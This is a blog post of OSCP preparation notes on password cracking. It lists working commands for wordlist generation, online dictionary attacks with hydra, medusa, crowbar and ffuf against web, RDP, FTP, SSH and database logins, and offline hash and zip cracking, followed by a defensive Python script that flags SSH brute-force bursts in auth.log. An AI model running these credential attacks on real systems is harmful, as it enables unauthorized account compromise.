OSCP notes dump: #CRACK


This is my last post covering notes taken during the OSCP exam preparation. Next time I'll cover different topics and I will also focus on the next certification Certified Red Team Operator ("CRTO").

Password cracking is an essential skill for ethical hackers, as it allows them to test and improve the security of password-protected systems. In this post, I will cover various password cracking methodologies, tools, and best practices, all grounded in the expert knowledge of the OSCP course. I'll provide a comprehensive overview of this crucial aspect of cybersecurity.

brute force

# crawl the site and write every word of at least 6 characters to a wordlist file (-m sets the minimum word length)
cewl www.meghacorpnone.com -m 6 -w megacorp-cewl.txt

# mutate the list with john: add the rule below to the [List.Rules:Wordlist] section of john.conf
# (it appends two digits to every word), then let john write the mutated candidates to a new file
$[0-9]$[0-9]
john --wordlist=list.txt --rules --stdout > mutated.txt

# create a wordlist with min 8, max 8 chars: one uppercase (,), two lowercase (@), two special chars (^), three numeric chars (%)
# the -t pattern must be exactly as long as the maximum length, so it has 8 placeholders
crunch 8 8 -t ,@@^^%%%

# dictionary attack against an .htaccess-protected directory
medusa -h <IP> -u admin -P rockyou.txt -M http -m DIR:/admin

# dictionary attack rdp (-n 1 = one thread, rdp locks accounts quickly)
crowbar -b rdp -s 10.11.0.22/32 -u admin -C ~/password-file.txt -n 1

# dictionary attack ftp (-e nsr also tries empty, username-as-password and reversed username)
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 21 -o "/root/oscp/lab/results/10.11.1.226/scans/tcp_21_ftp_hydra.txt" ftp://10.11.1.226

# dictionary attack ssh
hydra -l kali -P /usr/share/wordlists/rockyou.txt ssh://127.0.0.1

# dictionary attack smtp
hydra -L names -P /usr/share/wordlists/rockyou.txt 192.168.101.9 smtp

# dictionary attack mysql
hydra -L usernames.txt -P xxxxx.txt <ip> mysql

# dictionary attack mssql
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.128 mssql

# dictionary attack over http-post (the string after the last colon is the failure marker in the response)
hydra 10.11.0.22 http-form-post "/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN" -l admin -P /usr/share/wordlists/rockyou.txt -vV -f

# dictionary attack http post (the target host has to be given before the module name)
hydra -l admin -P rockyou.txt <IP> http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:Incorrect Username"

# dictionary attack basic auth
hydra -l admin -P 1000_common_passwords.txt -s 8090 -f 192.168.1.4 http-get /get_camera_params.cgi

# brute force using an existing saved request file; the word FFUF inside the file marks the injection point, -fr drops responses matching "error"
ffuf -request /root/test.txt -request-proto http -w rockyou.txt:FFUF -fr "error"
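
Seen from the defending host, the ssh runs above leave a very recognisable trail in auth.log. As an added example that is not part of the original notes, this script parses OpenSSH "Failed password" lines and flags any source that bursts failures inside a sliding window; the sample log lines, host name, year, threshold and window length are constructed assumptions.

```python
"""Spot hydra-style SSH dictionary attacks in OpenSSH auth.log lines: a source IP
is flagged when it produces >= THRESHOLD 'Failed password' lines inside a WINDOW-second
sliding window. SAMPLE_LOG is constructed for this example, not from a real host."""
import re
from collections import defaultdict
from datetime import datetime

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+)"
)
THRESHOLD, WINDOW = 5, 60   # failures per source, window length in seconds (assumed values)
YEAR = 2024                 # syslog timestamps carry no year; assumed for parsing

def parse(line):
    """Return (timestamp, ip, user) for a failed-login line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return datetime.strptime(f"{YEAR} {m['ts']}", "%Y %b %d %H:%M:%S"), m["ip"], m["user"]

def detect(lines, threshold=THRESHOLD, window=WINDOW):
    """Return {ip: (total_failures, distinct_users)} for sources that trip the rule."""
    events = defaultdict(list)              # ip -> [(ts, user), ...]
    for parsed in filter(None, map(parse, lines)):
        events[parsed[1]].append((parsed[0], parsed[2]))
    alerts = {}
    for ip, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            # drop events from the window start until the span fits in `window` seconds
            while (evs[end][0] - evs[start][0]).total_seconds() > window:
                start += 1
            if end - start + 1 >= threshold:        # burst detected
                alerts[ip] = (len(evs), len({u for _, u in evs}))
                break
    return alerts

SAMPLE_LOG = [  # constructed: 5 failures in 2 s from 10.11.0.22, 2 slow ones from 192.168.1.50
    "Mar 13 10:15:01 web01 sshd[1201]: Failed password for invalid user admin from 10.11.0.22 port 51402 ssh2",
    "Mar 13 10:15:01 web01 sshd[1203]: Failed password for root from 10.11.0.22 port 51404 ssh2",
    "Mar 13 10:15:02 web01 sshd[1205]: Failed password for kali from 10.11.0.22 port 51406 ssh2",
    "Mar 13 10:15:03 web01 sshd[1207]: Failed password for invalid user admin from 10.11.0.22 port 51408 ssh2",
    "Mar 13 10:15:03 web01 sshd[1209]: Failed password for root from 10.11.0.22 port 51410 ssh2",
    "Mar 13 10:15:02 web01 sshd[1213]: Failed password for alice from 192.168.1.50 port 40110 ssh2",
    "Mar 13 10:20:30 web01 sshd[1290]: Failed password for alice from 192.168.1.50 port 40122 ssh2",
    "Mar 13 10:20:31 web01 sshd[1290]: Accepted password for alice from 192.168.1.50 port 40122 ssh2",
]

print(detect(SAMPLE_LOG))   # the single typo from alice stays below the threshold
```

A real deployment would read the file (or journalctl output) incrementally and feed the alert into fail2ban or a SIEM rule; the distinct-user count helps tell a `-L` user-list run from one account being hammered.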

hashcat

# cracking hashes with hashcat: -a 0 is a straight wordlist attack, -m 3200 selects the bcrypt hash mode
# look the mode number for a given hash format up at https://hashcat.net/wiki/doku.php?id=example_hashes

hashcat.exe -a 0 -m 3200 hashes.txt wordlists\rockyou.txt

fcrackzip

# crack a password-protected zip file in dictionary mode (-D, wordlist given with -p); -u checks each hit with unzip to drop false positives
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt encoded